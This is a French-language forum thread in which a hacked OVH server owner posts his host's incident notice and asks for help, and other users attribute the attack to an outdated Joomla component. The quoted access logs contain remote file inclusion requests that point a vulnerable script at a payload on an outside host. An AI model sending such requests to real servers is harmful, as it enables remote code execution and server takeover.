Pirate - Hack, message de OVH!

[lyonist]

Je viens de recevoir ce message de OVH 8O on m'a piraté (un serveur dédié) 8O quelqu'un a eu ce problème s'il vous plait ?

Voilà le message de OVH :

> Bonjour,
>
> Nous avons du intervenir en urgence sur votre serveur dédié
> nsxxxx.ovh.net afin de bloquer une attaque. Il semble que votre
> serveur dédié présente une faille de sécurité ou qu'un utilisateur
> malveillant ait obtenu un accès.
>
> Nous avons été obligé de désactiver votre serveur. L'ampleur de la
> faille est telle que vous devrez très certainement procéder à la
> réinstallation complète du serveur.
> Merci de répondre à ce message via notre interface de support afin de
> prendre contact avec l'un de nos conseillers.
>
>
> Vous trouverez ci-dessous des informations concernant les processus
> en cours et les ports ouverts sur votre serveur au moment où nous
> sommes intervenus.
>
> ------- DEBUT DES INFORMATIONS COMPLEMENTAIRES SUR L'ATTAQUE -------
>
>
>
> Logs with datetime and time zone : 91.121.177.8 - - [11/Aug/2009:14:23:16 +0200] http://www.edainworks.com <http://www.edainworks.com> 'GET
> //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1' 404 2304 91.121.177.8 - -
> [11/Aug/2009:14:23:16 +0200] http://www.edainworks.com <http://www.edainworks.com> 'GET
> /logwarn.htm%20%20//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1' 200 49624
> 91.121.177.8 - - [11/Aug/2009:14:27:26 +0200] http://www.edainworks.com <http://www.edainworks.com> 'GET
> /logwarn.htm//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://labor.labcei.unimore.it/68049/guppy467/users/office1.jpg??? HTTP/1.1' 200 4962
>
>
> scan
>
>
>
>
> ------- FIN DES INFORMATIONS COMPLEMENTAIRES SUR L'ATTAQUE -------
>

En cherchant dans google sur ça, je trouve le texte mais je comprends pas :?

Help please :cry:

 

[nicofcb]

On dirait qu'il s'agit d'une faille Joomla.

J'ai trouvé un bug remontant à 2007. http://milw0rm.org/exploits/6003

Si c'est bien Joomla est-il bien à jour?

 

[loran750]

Ce n'est pas JOOMLA qui est en jeu mais un composant "outdated" pour Joomla, appelé "dbquery".
Il est surement pas validé par la communauté ou bien il est trop vieux...

Rappel pour Joomla : il faut mettre régulièrement à jour les extensions pour ce CMS
Rappel 2 pour Joomla : il faut utiliser uniquement les extensions qui sont supportées, qui sont populaires.

 

[lyonist]

je n'ai pas un site en joomla dans ce serveur :? apparemment ça c'est ce qu'il a passé en paramètre GET